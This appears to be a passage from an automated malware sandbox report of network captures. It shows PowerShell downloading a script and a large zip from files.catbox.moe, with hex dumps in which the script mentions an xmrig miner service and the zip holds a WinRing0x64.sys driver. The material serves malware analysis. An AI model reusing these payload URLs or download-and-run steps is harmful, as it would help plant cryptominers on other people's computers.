                                                                                                                                                                                                                                2024-12-06 09:26:00 UTC16384INData Raw: 77 ef 68 e3 39 af 30 a1 0d 50 23 21 ea ef bb 52 84 ad c6 08 26 16 78 f3 3a 43 cb de c2 a8 91 39 b1 23 bc f3 33 79 36 c2 2e 0f 3b 18 27 1e c7 3e 60 22 17 71 1c 94 1a a8 1c 08 43 d8 d0 2f 30 28 27 a4 de 81 61 4e 7b 9a c7 c4 df 63 b4 e6 62 50 c0 bb c1 92 88 2f a8 93 8a 5f 37 bc 3c 65 d1 10 59 17 9c fc f2 64 c6 21 5a 96 91 88 16 2f df 90 fa 42 07 b8 90 3d b0 1b fa a5 2a 29 5b f3 6d 4d 62 aa e4 d8 0e ad 66 57 18 b7 7b 47 94 ae 1d 45 03 ea 1c 24 fc 91 47 da 72 f4 05 9d 4b 32 0d 2c fa 0b be a6 93 e2 d0 d2 27 79 b7 8e dd 7e 41 ed 79 c5 60 21 54 16 75 e7 83 bf c3 a4 47 6c ac d1 19 1f 7f 59 1f ca 46 d9 02 8f a2 4f 49 f9 50 eb 89 57 17 65 1b 3e 4a 59 a4 49 c6 8c b7 b4 07 3b 61 f5 75 38 4a eb b7 1c ef f2 e4 ce 39 ba b5 fa fe c1 c0 d7 95 b8 30 4f 07 f7 63 f0 15 bf b4
                                                                                                                                                                                                                                Data Ascii: wh90P#!R&x:C9#3y6.;'>`"qC/0('aN{cbP/_7<eYd!Z/B=*)[mMbfW{GE$GrK2,'y~Ay`!TuGlYFOIPWe>JYI;au8J90Oc
                                                                                                                                                                                                                                2024-12-06 09:26:00 UTC16384INData Raw: 3c bb 71 94 bf df cb b2 1b 39 95 ae 4f 57 eb 5b d4 ea 83 ce 06 33 8c fa f8 06 2d 1e 5d bf d2 42 69 52 8f d3 99 1f 24 eb a8 62 e0 bc 11 ce ea 43 5c 7d 04 e6 b4 87 58 a5 cd 10 d3 99 49 9a d0 d2 e3 6d cd e4 cc d3 97 c6 8a a2 98 34 d2 a3 b6 e6 28 4f 34 a2 a8 83 13 a1 2e a0 ca 71 7c 86 d5 ee d2 e9 5f a8 57 1a db 88 fc 26 56 5c f5 35 c0 fc 52 d1 a3 65 e2 d2 56 7d 09 9e 8f 04 63 2b 58 99 c6 b4 2a 3c 5c 30 a4 17 15 35 82 c5 2f 25 9d d2 e0 99 bf fa 53 c4 3f 3d 56 c6 9f 45 15 a3 2e 96 ff 0b 06 a0 80 df 48 ab cd 6a 10 79 1a e8 50 3b 07 0e 0d cb 20 f7 cc d3 97 c1 7d f6 61 8d 60 95 3c 34 21 7f 8d 5f 2f 30 9c 7b f7 f8 d3 cf 7d 4c 42 ee 53 69 ee 1d 9a 68 f0 9f db 13 a1 f7 12 ed 67 30 da 16 8a 17 95 67 33 d0 5a 2a 2f a3 a8 9c f9 87 06 ce 8c e7 47 97 dc bb 39 a8 17 e4 33
                                                                                                                                                                                                                                Data Ascii: <q9OW[3-]BiR$bC\}XIm4(O4.q|_W&V\5ReV}c+X*<\05/%S?=VE.HjyP; }a`<4!_/0{}LBSihg0g3Z*/G93
                                                                                                                                                                                                                                2024-12-06 09:26:00 UTC16384INData Raw: b0 82 bc 5a 52 1d 44 90 e7 04 73 aa 03 c8 eb e0 63 5f 8d 7c 63 80 c7 b8 0b b4 57 e4 b3 32 a1 ac 20 cc ca c7 8c d6 05 e8 33 c1 71 ac 21 cc c9 86 72 12 b5 a2 9c 12 6c 29 27 3f c0 e3 9b 72 87 bc b3 80 ef 5e 37 8a 72 47 5e 53 23 28 4f 80 f6 16 94 bd 1a 1c e4 c1 1e e4 da fb b4 26 69 f2 ba c3 da 17 5c 32 f2 72 cc 28 0e 94 05 c7 8f 43 71 2e d9 10 59 c7 20 6c b8 1b ac bd 31 dc ce 82 b2 03 bd ed 40 6f 3b 90 61 e7 43 a7 37 12 c2 ab 7a 50 d4 1a e4 31 33 a2 cc 7c 8c 14 2e a8 3f a4 65 0a 7c 18 f6 04 5c a5 35 63 0b 40 a7 fe 44 a7 fe 2d 3e 46 3e 8f a4 eb 4e 51 bd 3d 28 ca cd 06 e8 ce 36 94 b3 9a 4d 39 43 b9 38 43 b9 38 43 b9 38 2b 3b d4 b7 af b6 2f 47 de 00 e0 2b f4 84 a6 63 d3 bc 6c 3b 78 5b 82 2d 94 1a 19 58 3f cf 28 8e b6 11 85 1d d4 9b 85 11 65 f1 7a b1 51 3d c4 fd
                                                                                                                                                                                                                                Data Ascii: ZRDsc_|cW2 3q!rl)'?r^7rG^S#(O&i\2r(Cq.Y l1@o;aC7zP13|.?e|\5c@D->F>NQ=(6M9C8C8C8+;/G+cl;x[-X?(ezQ=
                                                                                                                                                                                                                                2024-12-06 09:26:00 UTC16384INData Raw: 98 66 04 57 1a fa 6f c8 6d e6 a4 ef 77 45 8d 28 ea 1e 05 f3 32 ad 5e 0c 6d 93 21 1b 51 d0 a3 ee d0 f2 2e 30 e4 52 24 a0 97 0b eb 8d 5e 3e a0 bd 74 21 f8 52 af 75 6b a0 f4 e6 59 ad 88 c8 99 4a 2a 4f f7 fa a5 32 b9 44 ab 33 9e d0 77 6e 8d 11 ea 10 33 06 9e ed 8d 18 0e 5a 23 ff e2 77 0b 6a 23 18 88 c3 b6 1b c7 89 e9 e9 2e 56 40 a1 d5 ab 24 56 9b f4 a7 a1 54 24 05 cb 61 32 42 f9 a5 da 2d 10 ec 50 20 a6 5f 65 2c db ef 42 b6 93 39 de 65 ad e0 f6 7c 0e 1f cb 30 14 42 cf 87 b0 7a cc 15 fa 4d 8a 35 f7 0f 43 bf bb 70 46 d3 d9 50 4c bf 0f ff ca 05 b4 b9 92 01 7f c3 80 ff 2e d0 d4 de 1f 9b fa 1f b7 b1 7c ab 07 75 bb 95 49 eb 9b 4c 24 19 23 3a 49 a4 af ad a2 ba 69 42 dd ae 95 97 64 93 7b ca 45 6d ae 29 48 4f 93 24 23 f0 b0 8f 2d d2 c3 bf a1 f8 9d 5c 57 d6 88 ea ba c6
                                                                                                                                                                                                                                Data Ascii: fWomwE(2^m!Q.0R$^>t!RukYJ*O2D3wn3Z#wj#.V@$VT$a2B-P _e,B9e|0BzM5CpFPL.|uIL$#:IiBd{Em)HO$#-\W
                                                                                                                                                                                                                                2024-12-06 09:26:00 UTC16384INData Raw: c7 4c a1 2c 9e 6e b4 aa cf 6a b3 55 3d 56 0b d3 d4 a5 c9 b1 58 c1 29 86 55 bc 78 b5 29 69 e7 ad 36 94 fc 5e ae 23 71 35 5a 91 67 1b 39 03 07 16 75 a4 a7 48 de 6a a1 1c 61 db e7 cb 60 20 e6 4f e1 ee 3d 78 0c 66 cb 86 ef cc 8a ed 4a 95 9c bb 8d 3b 5f cc 4f 4f 72 c9 5a dd fe 15 17 e1 69 6f 70 21 25 62 e3 d7 a1 18 b5 7b 56 1b 7d 70 74 32 48 d8 b8 fa 5c 73 5e 37 d9 20 fc 8d 18 e1 0b 4d c2 57 70 a9 d9 e6 e3 2b fc 58 cc 8f b6 ba 29 cc ab 6b 96 19 bc ba a1 ac 21 93 60 fd 0c 5b b1 da d0 bf dd 31 e4 5b 4c 88 81 0c b1 66 35 fb ff bd f9 61 19 7c 76 7b 77 be df 42 f7 4a 4d 00 8e a8 24 f4 44 9e bd 11 69 3c 62 57 30 64 0a 43 2e ad 30 1a 69 e1 c7 09 6b 59 5a a8 86 63 8f e1 79 e7 5a ae e1 7b 7e 48 5f 47 b0 a1 c7 4a 73 73 e5 d9 9d d6 99 d8 2e 5a c7 e3 3f 43 c8 0c b1 1e 26
                                                                                                                                                                                                                                Data Ascii: L,njU=VX)Ux)i6^#q5Zg9uHja` O=xfJ;_OOrZiop!%b{V}pt2H\s^7 MWp+X)k!`[1[Lf5a|v{wBJM$Di<bW0dC.0ikYZcyZ{~H_GJss.Z?C&
                                                                                                                                                                                                                                2024-12-06 09:26:00 UTC16384INData Raw: 8c 2d 24 db 36 7a 9c 2e ae f1 5c 81 00 88 54 c7 7a a5 5e 7b 82 74 90 9d 5e 11 49 5d a8 4f a0 57 c0 e7 c4 5e a8 ee 3d ee 4e a2 03 a4 85 db 42 46 4a 07 0b 80 1a 56 ea d3 e6 53 ac 03 a3 26 87 82 a7 32 9a 4a b9 6a 05 0b ce 97 4a 7a f2 fc 0c 07 14 46 57 9f d9 68 3a da ec 6c 3e 26 cd 13 78 26 98 92 87 f2 d9 e8 d1 b6 d6 15 f2 84 5c 09 42 37 c0 68 d5 55 d5 19 67 97 cc 4e 6a 9f d8 1a 9e 1d e1 40 00 bb a4 4c 0c 95 ee 8c 79 39 f5 21 9f 0f 7a e1 4d f0 85 86 9f 42 ad 9e a0 c2 a7 0c 06 91 f6 a6 80 cb ee 9c be 29 00 e8 00 53 d4 d5 5a 96 82 8e 4b d4 7f 1e ba a4 da 1b 3c 5d 79 14 2a 0a b5 12 cb 84 75 ac 75 05 26 1b a7 5f 0b b3 c6 e3 05 0e f2 3a 5c 39 76 07 aa 3f a3 5d 93 66 b4 87 68 10 d9 80 7a 5c 4e a3 46 ea 61 bd 4c aa 99 e0 df 34 a3 17 d4 e5 c5 d4 e9 f1 c2 b3 2a 0b 35
                                                                                                                                                                                                                                Data Ascii: -$6z.\Tz^{t^I]OW^=NBFJVS&2JjJzFWh:l>&x&\B7hUgNj@Ly9!zMB)SZK<]y*uu&_:\9v?]fhz\NFaL4*5
                                                                                                                                                                                                                                2024-12-06 09:26:00 UTC16384INData Raw: 22 ce 22 80 f2 87 fd be cb fe 63 0f 8f b5 b7 25 2b 58 b8 d0 39 6c 1c 30 36 63 65 65 67 66 46 83 be 6b 1c 8e c5 13 75 47 97 7f df 46 71 91 02 df e6 f0 7c 9c fc a8 bf 34 45 54 fb 47 28 a6 48 a5 6f a1 9c c8 d8 61 bf 5f 02 ca 7f 6f 3e df 5a 0f d6 4e f5 89 72 4e be fe a8 2e 96 9a 65 2c ea a8 1a 4a a2 29 d3 88 91 0a df e3 f1 f5 52 fc 67 91 78 a1 22 58 24 78 16 e8 4b 50 76 36 56 d7 70 2e 1c 33 ca c1 c6 86 09 16 dc ef 7c 96 9a b8 9e c6 11 8e c0 d7 c7 2a d5 92 5b ad 7a 99 84 32 a7 0c 88 13 32 65 fd fe 2e ef 13 7d 4b 90 fa 22 2f 74 25 ef c2 b3 b1 7a e7 36 7c 3a 9b 1e 2a f1 40 a5 52 cd ce c0 fb f8 83 35 86 93 2b af f0 87 af 35 fb 94 52 55 76 a0 37 70 8f ca 8e bb 62 ef 6d 72 63 1b df 26 78 3c 1f c6 37 3f 30 0b 89 3a 15 1d 5d 53 56 95 6a 20 b0 a7 bb 33 4c 68 81 a0 40
                                                                                                                                                                                                                                Data Ascii: ""c%+X9l06ceegfFkuGFq|4ETG(Hoa_o>ZNrN.e,J)Rgx"X$xKPv6Vp.3|*[z22e.}K"/t%z6|:*@R5+5RUv7pbmrc&x<7?0:]SVj 3Lh@
                                                                                                                                                                                                                                2024-12-06 09:26:00 UTC16384INData Raw: 79 d4 b5 74 d2 20 83 90 9e 8d 7f 7a 9c 66 d7 0d d2 83 81 d6 32 64 85 12 93 4f be cd 50 c9 1e ac 97 6d 64 3b 78 ef 2d f0 76 dc af 01 ae 08 d4 00 e8 ef 2a 79 df cf 18 9f 69 4f 05 ee a9 1e 04 48 1a f7 d4 65 50 4b 99 7b ea 4a 78 d3 6e 4c 76 38 09 be 22 2d 79 88 6e 64 81 a4 99 6f 2d 6c 95 aa 29 b7 2d c7 95 1e d6 db 82 e5 b6 02 dc b7 02 08 ec 29 b7 3d 87 6c 46 64 9a ce 7b bb 20 ce c5 15 0f c4 1f f2 93 3f 29 8a 34 ca b3 e4 7b cc 3b 00 40 bc 01 47 7f 37 b5 41 3e 65 41 96 98 bf 88 ad bd 28 b4 ad 5e 73 c4 95 8c 5b 02 2a c6 43 8a 96 0a 0c ae 36 82 df b1 5a 31 6e 85 02 a4 d9 11 57 5b 5c 41 91 af 18 8b d5 12 83 33 03 bc 48 51 fa 1a 13 17 ee 74 20 c9 fc 38 fe b8 b6 f1 8f 97 34 b8 a5 1d f2 47 04 c2 4d 18 07 9c 86 af 57 8c f3 a0 86 70 a9 0d 53 cc 07 43 bb a0 16 d4 50 59
                                                                                                                                                                                                                                Data Ascii: yt zf2dOPmd;x-v*yiOHePK{JxnLv8"-yndo-l)-)=lFd{ ?)4{;@G7A>eA(^s[*C6Z1nW[\A3HQt 84GMWpSCPY


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                1192.168.2.749701108.181.20.354437292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-12-06 09:26:04 UTC171OUTGET /ei5hyq.ps1 HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                Host: files.catbox.moe
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-12-06 09:26:05 UTC547INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Fri, 06 Dec 2024 09:26:04 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 2459
                                                                                                                                                                                                                                Last-Modified: Thu, 30 May 2024 10:40:35 GMT
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                ETag: "665857a3-99b"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self';
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                2024-12-06 09:26:05 UTC2459INData Raw: 23 20 43 68 65 63 6b 20 61 6e 64 20 72 65 74 75 72 6e 20 63 75 72 72 65 6e 74 20 75 73 65 72 20 6e 61 6d 65 0d 0a 24 63 75 72 72 65 6e 74 55 73 65 72 4e 61 6d 65 20 3d 20 5b 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 50 72 69 6e 63 69 70 61 6c 2e 57 69 6e 64 6f 77 73 49 64 65 6e 74 69 74 79 5d 3a 3a 47 65 74 43 75 72 72 65 6e 74 28 29 2e 4e 61 6d 65 2e 53 70 6c 69 74 28 27 5c 27 29 5b 31 5d 0d 0a 23 20 50 61 74 68 73 0d 0a 24 64 69 72 63 68 65 63 6b 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 2e 6c 6f 67 73 74 78 74 22 0d 0a 23 24 66 69 6c 63 68 65 63 6b 20 3d 20 22 43 3a 5c 70 61 74 68 5c 74 6f 5c 78 6d 72 69 67 2e 73 65 72 76 69 63 65 22 20 20 23 20 59 6f 75 20 6d 69 67 68 74 20 6e 65 65 64 20 74 6f 20 61 64 6a 75 73 74 20 74 68 69 73
                                                                                                                                                                                                                                Data Ascii: # Check and return current user name$currentUserName = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.Split('\')[1]# Paths$dircheck = "C:\ProgramData\.logstxt"#$filcheck = "C:\path\to\xmrig.service" # You might need to adjust this


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                2192.168.2.749712108.181.20.354437504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-12-06 09:26:09 UTC171OUTGET /1qm51s.zip HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                Host: files.catbox.moe
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-12-06 09:26:10 UTC546INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Fri, 06 Dec 2024 09:26:10 GMT
                                                                                                                                                                                                                                Content-Type: application/zip
                                                                                                                                                                                                                                Content-Length: 42500905
                                                                                                                                                                                                                                Last-Modified: Wed, 29 May 2024 11:45:49 GMT
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                ETag: "6657156d-2888329"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self';
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                2024-12-06 09:26:10 UTC15838INData Raw: 50 4b 03 04 14 00 08 00 08 00 c9 83 97 58 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 20 00 57 69 6e 52 69 6e 67 30 78 36 34 2e 73 79 73 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 55 54 0d 00 07 ea b7 27 66 53 00 55 66 e9 7c 56 66 ed 79 09 5c 8c 5d fb f0 3d d3 b4 ef 5a 54 54 13 15 85 ba a7 45 2b 9a d6 49 fb 22 a9 68 9b a9 e6 a9 66 6a 66 42 44 7b 1a 53 9e 84 88 90 50 11 49 b4 87 36 12 2a 21 65 cf f2 a8 64 29 5b 42 e6 3b f7 dd 20 f1 3c cf fb bd df ef 7b 9f ff ef fb de 33 bf 33 d7 72 ae 73 ce 75 ce b9 ae eb be ce 7d 3b f9 64 41 7c 10 04 e1 40 e5 72 21 a8 1a 9a 28 16 d0 df 97 3e 50 25 54 6b 25 a0 d3 c2 ed 6a d5 18 c7 76 35 cf 30 2a 13 1f c5 a0 87 32 02 23 f1 c1 81 34 1a 9d 85 0f a2 e0 19 31 34 3c 95 86 b7 76 f1 c0 47 d2 c9 14 1d 71 71 11 75 de 18 86 a6 b4 cf
                                                                                                                                                                                                                                Data Ascii: PKX WinRing0x64.sysuxUT'fSUf|Vfy\]=ZTTE+I"hfjfBD{SPI6*!ed)[B; <{33rsu};dA|@r!(>P%Tk%jv50*2#414<vGqqu
                                                                                                                                                                                                                                2024-12-06 09:26:10 UTC16384INData Raw: 6d 74 e9 93 4b da 04 51 18 9a ca 52 01 85 3c d9 6d 98 6c c0 21 08 83 44 18 d0 82 02 fe 59 16 cd ba 33 cf 67 c1 d0 21 9d 58 59 18 70 ec 7b 0c b8 97 f2 6d c6 80 df be 27 32 7f 45 1a b6 b3 16 af 86 a0 95 7c 2e 02 d9 28 10 58 f3 13 66 1d 14 6b 08 94 e7 53 50 9c 31 68 06 05 b5 30 06 bd 4c 41 ad 8c 41 79 14 94 c0 c8 67 41 83 28 a8 3d 04 05 ee 9f 08 35 90 5d df ab 0c 64 d2 d5 91 de 7b 1f c3 30 0a b8 19 02 dc 12 bb eb cd 2d f1 bb df 24 7e 17 9c c4 ee 86 a3 1b 5f e9 97 df 1d 27 f1 bb e4 a4 e9 74 d7 1c de 00 7b 5d 03 2b de 00 8b 97 d2 e1 c5 8d 74 3f 64 32 bf 1f 92 dd d7 98 3c b4 dc b1 b4 59 4a 15 0c 8a 85 db 3c b7 e3 3f 82 76 3f ab a8 94 29 ab 72 7d 5d 7b 5a bc ff e6 4a 03 7b da 58 40 e1 36 ef 2e 69 95 b2 aa b0 cc b3 0c ef 02 4d 97 4e e0 65 8b a2 18 71 5a 11 ca 8a
                                                                                                                                                                                                                                Data Ascii: mtKQR<ml!DY3g!XYp{m'2E|.(XfkSP1h0LAAygA(=5]d{0-$~_'t{]+t?d2<YJ<?v?)r}]{ZJ{X@6.iMNeqZ
                                                                                                                                                                                                                                2024-12-06 09:26:10 UTC16384INData Raw: 94 69 56 79 d2 05 f5 93 af de 18 b4 3b 3f e4 b6 80 95 2b 9c 78 0b 79 16 7b d3 d1 bd 85 cf 33 3b 6a 7b 5a e9 ba b9 5c cd a7 7a 97 3a d3 ca 24 7e 1c 43 11 ce e2 4b a1 e2 11 6b ef 94 a2 b9 36 ea 26 d2 d9 c7 26 d8 43 d3 49 bd 94 17 52 a7 5c 40 fb 3b eb 3a 5b e9 da ea 54 37 ae f1 e1 7d 03 ad 41 bf d7 c6 80 fd db 99 4d 00 f1 60 1f 88 f2 db 12 b1 64 7c c8 79 24 9a 9f a3 11 91 30 98 8b 2e 58 99 78 60 a6 24 8a 8e 34 af b2 c9 b1 17 cd b5 9e 16 83 ed 58 88 37 17 e1 7a 41 5f 76 8e fb e6 d3 ac cd 20 28 ef 7e 5c 70 a3 3e a8 08 0d 59 15 c1 6e 86 07 76 e0 b8 37 03 c0 8b 8c 20 f5 5e 37 5b 9d 3d f8 9f 06 70 9b 11 60 fd 3d 1c 60 cf 3d aa 7f 78 14 03 c0 2b 92 20 f5 8b 1c 60 be 0e 70 38 d3 00 e0 57 01 e6 dc a3 ba a4 af a5 8f 5c 15 e2 95 3a 4e 5f 5d 02 2e 4c 0b ad 38 cc 13 00
                                                                                                                                                                                                                                Data Ascii: iVy;?+xy{3;j{Z\z:$~CKk6&&CIR\@;:[T7}AM`d|y$0.Xx`$4X7zA_v (~\p>Ynv7 ^7[=p`=`=x+ `p8W\:N_].L8
                                                                                                                                                                                                                                2024-12-06 09:26:10 UTC16384INData Raw: 70 24 0f f9 fa 9e ea f9 56 6c 42 d8 4d 9f a2 11 69 cc 5a 0e 37 e4 68 42 b0 c2 e2 14 c9 7a 50 de 89 41 9d 02 93 29 74 11 cd c9 57 ea ac 37 f1 b2 8f 96 cf 21 36 70 33 ac d7 d9 f7 b0 2a 0c 81 a0 e4 da 2b cf 27 03 fd b3 01 69 0b 7d e1 6e df c0 ea 58 ef 10 e9 d1 18 c8 c3 11 4d 5d 45 56 a1 83 b0 1e 18 6c 33 5d 35 9f 7d 4f f5 51 57 37 45 ad 1d 15 3b 77 15 ef 93 71 8a 8b d8 0f 31 fb 65 9e e3 cc 65 33 ce 39 00 16 5f 01 29 0d 00 8e 0f 99 c2 07 7b f1 67 04 e4 b9 71 bd d5 1c 3b ab 09 e2 3f 4e e1 d3 b0 21 b9 c5 69 d8 99 db 8c 74 69 d1 3b 98 11 b7 fd c5 8d 6e 65 a3 8f 75 88 e6 20 46 f3 a3 b5 a1 00 04 83 45 f0 1b d6 86 08 38 db fe bb fd a1 bd fe 1f f6 47 b6 b1 3f 32 ff cd fb 43 ad 8a dd 1f 67 aa ae b5 3f f2 a7 88 eb a5 f9 84 41 be 13 d7 4b a9 dc f2 7c 14 92 dc 49 01 73
                                                                                                                                                                                                                                Data Ascii: p$VlBMiZ7hBzPA)tW7!6p3*+'i}nXM]EVl3]5}OQW7E;wq1ee39_){gq;?N!iti;neu FE8G?2Cg?AK|Is
                                                                                                                                                                                                                                2024-12-06 09:26:10 UTC16384INData Raw: ea b8 28 b4 3b 12 ad 26 d8 fd 7a 26 24 ea 4a a6 67 e2 63 bb 90 f1 b8 1a a8 6f a2 a7 cd a4 c4 7a ce 9a dc 43 89 1d f2 c7 6e fc 1e 0d cb 46 94 70 83 32 4a 1c 28 e4 09 13 91 3d b1 91 78 41 3b 50 bb fa 00 4e 13 92 e4 74 33 58 3d 36 21 a0 d3 89 a6 37 5b e7 50 0e e7 d9 4b ee 04 6d 08 0b a3 7d b3 df 88 e6 9f 0b 45 1f 67 8f 8b c7 a2 5f 2d e7 a3 e4 f2 61 54 f4 46 cf 47 fc 39 fc 21 28 ba b9 a1 dd 11 0f 25 8f 02 6b bc 7f b4 d6 b2 9f a5 f4 22 1e c3 76 91 8a 46 05 da 82 47 68 41 7d 41 dd e3 56 51 84 81 4b fd 98 0b 88 7b 0e a6 05 b6 18 b4 d6 14 55 f9 94 4d 11 cf f2 b4 58 c1 9d e6 9b d6 4b 8b d8 8a c3 9f be 07 03 43 9b c6 45 f6 9c 07 36 0d 58 89 43 23 cf e9 8e b4 58 26 8e e1 d8 16 58 12 75 25 7e 8a ea fa 14 99 df c1 f1 7a 42 0a 8a 83 6b 0e 13 aa 80 28 4b 99 4b 56 80 7e
                                                                                                                                                                                                                                Data Ascii: (;&z&$JgcozCnFp2J(=xA;PNt3X=6!7[PKm}Eg_-aTFG9!(%k"vFGhA}AVQK{UMXKCE6XC#X&Xu%~zBk(KKV~
                                                                                                                                                                                                                                2024-12-06 09:26:10 UTC16384INData Raw: 3d 4b 16 74 c1 8a b5 39 6a cd 9a 47 d8 30 bf 20 35 ab 8f fe 14 e3 94 4c 8b bc 6b 87 f5 10 d8 80 1e 86 75 19 e4 89 31 80 1d 4b 47 fa 0d 48 d5 57 6f 17 f0 0d 88 81 a4 67 98 05 ce d3 9c c2 f9 9a 38 5f 05 e7 4d 0b 9c 17 ed ef bc 71 ba 2a 0d 7d 5f cb 94 d5 fa 2c 16 a3 7e 54 b3 f4 9e 88 35 41 ab fb f2 b9 77 c1 0e d7 b3 2d e4 9c ea 0b f9 4c e4 7d 7a 61 ad ef ab 8f 0b ec 0c f3 30 b6 9e 11 d2 5a 29 2f 2b 3e c7 d8 02 fb d0 62 de 9a a8 10 e7 9a a0 7e e8 10 0d 3b 05 65 f4 cd bf c7 93 e7 f1 7b e8 30 c1 42 60 16 dd 31 d7 5c cd 99 2b 7c 82 2b e6 a5 2b e6 ab 2b e6 a6 eb 74 c7 34 f1 1e 12 cd b1 75 c1 7d 48 04 ee 2d 11 ef ba 04 4a f1 5a 95 6d f4 ce 9d b1 ca fd 05 d6 0e 94 6a 23 ed c5 23 96 a1 3a 45 ff 8e 98 13 71 9e 03 6c cb 61 8b 9a c7 7e a8 07 31 b3 bc ae 42 62 c2 0c bb
                                                                                                                                                                                                                                Data Ascii: =Kt9jG0 5Lku1KGHWog8_Mq*}_,~T5Aw-L}za0Z)/+>b~;e{0B`1\+|+++t4u}H-JZmj##:Eqla~1Bb
                                                                                                                                                                                                                                2024-12-06 09:26:10 UTC16384INData Raw: 74 95 d7 9d 3d f7 df f7 b4 bc fa 71 5b a3 0a 6f 43 86 6c 6d b7 c2 d1 63 62 f4 f0 37 8a ec 2b 75 b2 aa 66 37 aa 98 ee 9b 9c fc 63 87 5d 8a 4b 31 36 cf b6 1e fb ee 92 ba ca 80 fd 95 4b b3 8f c6 af eb 2b b3 2f 2d b7 88 66 db 7d 9e 99 b1 9f 2b 6f df e4 d3 2c fa d1 ed 3a d1 fb 3a 77 3e d6 30 77 c8 fd 2a d7 df d4 f1 da 67 71 a0 c3 54 f3 87 11 cb 0f ec 1a 13 b0 f2 dd bc 1d 3d 7e 7b a5 8a 4e 0e f0 f0 c8 54 b6 f2 fa 5d 31 74 dc f4 66 be 7b fa 75 9c 5e 65 70 ec b5 ae cb 9f bd aa 54 5a a8 63 72 f6 9d e7 ec db f3 22 bd 4a 35 4e 39 79 a3 97 ed ea 93 96 33 1d 03 86 28 56 77 9e 77 3a b8 6e 31 dc c4 b7 cf f2 9f d1 70 b5 dd 76 27 5d 99 11 51 c2 c2 31 0d eb aa 5e 5c 31 fa a6 e5 0c 6b 8b 71 37 7b 77 e9 d0 22 f1 b4 5b f0 b5 1d e3 2a 56 d6 19 0d 7c 37 2c d3 bf f2 f6 a8 0d e5
                                                                                                                                                                                                                                Data Ascii: t=q[oClmcb7+uf7c]K16K+/-f}+o,::w>0w*gqT=~{NT]1tf{u^epTZcr"J5N9y3(Vww:n1pv']Q1^\1kq7{w"[*V|7,
                                                                                                                                                                                                                                2024-12-06 09:26:10 UTC16384INData Raw: b9 38 01 d0 1b bb e3 57 01 f6 77 a5 32 48 c0 2f 73 67 80 c5 c5 20 01 bf 36 60 7f f3 55 40 82 2a 76 05 0e 03 40 13 bb e3 d7 29 8c 70 da d8 5d 07 bb e2 5c 00 d0 c5 ee f8 65 32 12 80 e6 d8 1d bf 9e 61 7f b7 c6 ee c6 f8 33 18 b6 3a 60 77 fc 9a 3d 09 80 2e d8 bd 2b 76 dd c1 fe ee 86 dd f1 6b cb 54 00 7a 61 77 fc d2 f6 02 a0 96 07 44 f8 b5 cf 07 eb 4b 09 88 f0 eb 0d f6 77 85 32 10 bd c3 2e 3f 5f 80 c5 c2 40 84 5f a5 98 2a f9 82 dd eb b0 2b 1d 63 99 ef d8 1d bf b2 f0 49 6a 15 20 52 c2 2e 4c 50 81 0a 76 c7 af 1a 4c 79 a9 61 77 0d ec 9a 3d 1d 80 46 d8 1d bf aa 43 00 a6 5b 80 a8 19 76 09 31 a5 dc 02 bb b7 c2 ae 67 33 00 30 c1 ee f8 95 89 b1 79 47 ec 8e 5f cf b0 bf 2d b0 3b 7e 25 63 e1 52 77 ec de 13 bb 7a 45 03 30 59 8d 27 5e fd dd 1f e3 a3 31 a4 a6 08 23 b8 ac 2b
                                                                                                                                                                                                                                Data Ascii: 8Ww2H/sg 6`U@*v@)p]\e2a3:`w=.+vkTzawDKw2.?_@_*+cIj R.LPvLyaw=FC[v1g30yG_-;~%cRwzE0Y'^1#+
